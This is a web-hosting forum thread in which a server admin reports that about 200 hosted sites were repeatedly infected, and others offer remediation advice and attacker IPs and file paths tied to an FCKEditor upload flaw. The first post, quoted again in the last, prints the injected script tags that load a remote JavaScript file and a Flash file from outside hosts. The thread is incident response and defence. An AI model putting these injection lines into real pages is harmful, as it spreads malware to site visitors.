Results 1 to 8 of 8
  1. #1

    Web Server has been attacked, Help!

    Server info:
    Windows 2003 box
    Dedicated server currently hosted at the planet.

    Problem:

    It would appear there has been a security breach into the server recently. This morning we cleared off a Trojan, and also a new user that had been created on the server.

    All of our websites we host (around 200) had been affected. Almost every file had new javascript or links to an .swf, they load in iframes and are very malicious, actually giving any vistor to the site a virus.

    I tracked down the embed code that I found in most files appended to the end of each file.

    Below shows up in most .asp, .cfm, .html files (no spaces, just can't paste a url in here yet)...

    <scRipT s rc=http ://ww w .jeet.co.kr/flash/help.js></sCrIpt>
    <scRipT sr c=h ttp:// chanm.3322. org/flash/flash.swf></sCrIpt>

    Below shows up any any .js file (no spaces, just can't paste a url in here yet)...

    document.writeln ("<script sr c=\"ht tp:// ww w.jeet.co.kr/flash/help.js\"><\/script>");
    document.writeln ("<script sr c=\"htt p:// chanm.3322.or g/flash/flash.swf\"><\/script>");



    So I got a script that opens up every file looking for this code and stripping it out. Seemed to work at first, but now all the sites have been rewritten again..... and again. So obviously something is overwriting this.


    Any help or idea how to stop this? I'm pulling my hair out

  2. #2
    Join Date
    Jun 2009
    Location
    Los Angeles
    Posts
    6
    We do not use Windows, but here is my advise.

    1) Move all log files off site, then go audit them.
    2) Install all updates/patches.
    3) Update av software, and scan.
    4) Check your firewall, block any suspicious IP addresses.
    5) require a password change on all accounts.
    6) then worry about fixing user files.

    Keith

  3. #3
    This calls for a complete clean reinstall after backing up your sites.

    The reinstall must take place using kvm/ip while off network.

    *Before* putting it back on the network, properly configure the firewall and all other security settings including those applying to IIS. Apply all required patches and service packs.

    You can then restore the sites one at a time, *after* ensuring that each is completely clean *and* does not offer a way in that you do not know about. In other words, they have to be completely audited.

    *Before* doing any of the above, figure out how you got hosed. Because you will need to prevent it in the new configuration. There is no point in proceeding before this is known.

    After all of that, do not *ever* be tempted to use a browser while in a terminal services session.
    edgedirector.com
    managed dns global failover and load balance (gslb)
    exactstate.com
    uptime report for webhostingtalk.com

  4. #4
    Join Date
    Jul 2007
    Posts
    2,050
    It is not necessarily a problem with the web server security as there are lots of other reasons why pages get infected. A few possible reasons are:

    1. Vulnerable Scripts
    2. Insecure Programming
    3. Old versions of web applications
    4. Hacked FTP passwords

    There are many more reasons. Also majority of the applications are found to be vulnerable to SQL Injection. Hence, reviewing the scripts is equally important as checking the server security. Also it should be made sure that no FTP password is stored in FTP clients.

    A Web Application Firewall(WAF) comes handy in this case as it blocks a lot of web attacks. My choice is DotDefender.
    Prashant T.

    Don't run after Success. Run after Excellence and Success will soon follow.

  5. #5
    We have recently come across this same issue and have been dealing with the it for the last 3 days. Note that this attack is believed to have happened due to a security exploit with FCKEditor utilizing an upload and creation of a .jpg file and the files image.cfm and index.cfm withing the directories images/accounts.

    Many but not all of any javascript, html and application.cfm files utilized with the websites on the server had code injected into them which we took the steps to remove on more than one occasion as they continued to replicate.

    With some research it is known that it is an attack from a list of IPs from China. I assume a possible attempt to steal login info and possibly worse depending what would be stored on the infected server.

    This attack has been done through the FCKEditor utilized on 2 of the sites that are hosted on our server. It was noticed that the overall replications were occuring most in only one of the website folders but did start to spread over some time.

    Some steps we had to take (from our findings and searching google). . .

    If you use IIS, check to see that your sites have logging enabled. This can be switched off via the image.cfm file injected to the machine.

    There are a few .asp files that are with FCKEditor that are "bad" files and need to be removed. At this very moment I cannot recall what they were but I recommend looking into when they were last updated as many of these files should not have been modified or even used recently. Also keep look at modify dates for sample folders or folders that are not for regular use. For the most part these can be removed but we still need to test that FCK still functions properly after all of what we removed For ColdFusion specifics look for 3 files in reference to uploads.cfm and similar and MAKE SURE THEY ARE SECURED WITH SOME FORM OF SECURITY! We believe that this was where the actual attack first occurred as we seemed to lack the full security of these admin level files.

    From what has happened I think this all became possible from this .jpg being uploaded with a image.cfm file that holds code for doing quite a bit of chaos from uploading all sorts of things, removing content, creating its own paths and removing logs of it's occurrences.

    Below is a list of paths and IP's discovered from our logs. . .

    222.245.219.25
    222.245.219.131
    222.245.211.158
    222.245.216.114
    222.245.214.74

    /images/accounts/ (image.cfm, index.cfm, "Chinese Characters".jpg)

    /includes/mxAjax/index.cfm t=1030 80 ***NOTE that the t variable content changed with each log and also was sometimes a form of write option for posting content.

    /errors/dumps/application.cfm

    Some of the paths above were not found in our system so when the IP's called to them they were thrown a 404. Can't say the same would happen for everyone though

    As of a few hours ago, we are clean. I will know for sure in the morning. My info may have been lacking as it is late and I am tired form dealing with this for half of today Drop a line if you have questions.

    Best of luck!

  6. #6
    ---
    Peter M. Abraham
    LinkedIn Profile

  7. #7
    Join Date
    Nov 2001
    Location
    Vancouver
    Posts
    2,416
    “Even those who arrange and design shrubberies are under
    considerable economic stress at this period in history.”

  8. #8

    just to help

    hi,
    please contact servosupport.com as you can rely on them.
    we were happy with their service.
    Quote Originally Posted by surf1punk View Post
    Server info:
    Windows 2003 box
    Dedicated server currently hosted at the planet.

    Problem:

    It would appear there has been a security breach into the server recently. This morning we cleared off a Trojan, and also a new user that had been created on the server.

    All of our websites we host (around 200) had been affected. Almost every file had new javascript or links to an .swf, they load in iframes and are very malicious, actually giving any vistor to the site a virus.

    I tracked down the embed code that I found in most files appended to the end of each file.

    Below shows up in most .asp, .cfm, .html files (no spaces, just can't paste a url in here yet)...

    <scRipT s rc=http ://ww w .jeet.co.kr/flash/help.js></sCrIpt>
    <scRipT sr c=h ttp:// chanm.3322. org/flash/flash.swf></sCrIpt>

    Below shows up any any .js file (no spaces, just can't paste a url in here yet)...

    document.writeln ("<script sr c=\"ht tp:// ww w.jeet.co.kr/flash/help.js\"><\/script>");
    document.writeln ("<script sr c=\"htt p:// chanm.3322.or g/flash/flash.swf\"><\/script>");



    So I got a script that opens up every file looking for this code and stripping it out. Seemed to work at first, but now all the sites have been rewritten again..... and again. So obviously something is overwriting this.


    Any help or idea how to stop this? I'm pulling my hair out

Similar Threads

  1. Is my server being attacked? Please help.
    By Chonanis in forum Hosting Security and Technology
    Replies: 7
    Last Post: 12-26-2008, 08:55 AM
  2. server attacked
    By netedgetech in forum Hosting Security and Technology
    Replies: 20
    Last Post: 07-17-2008, 09:29 AM
  3. Server being attacked?
    By dotdoms in forum Dedicated Server
    Replies: 8
    Last Post: 04-30-2007, 12:49 PM
  4. Server keeps being attacked.
    By Sting13 in forum Hosting Security and Technology
    Replies: 8
    Last Post: 07-15-2005, 04:05 PM
  5. How Do i Know if my server is getting attacked
    By abdallah in forum Dedicated Server
    Replies: 16
    Last Post: 09-30-2003, 10:30 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •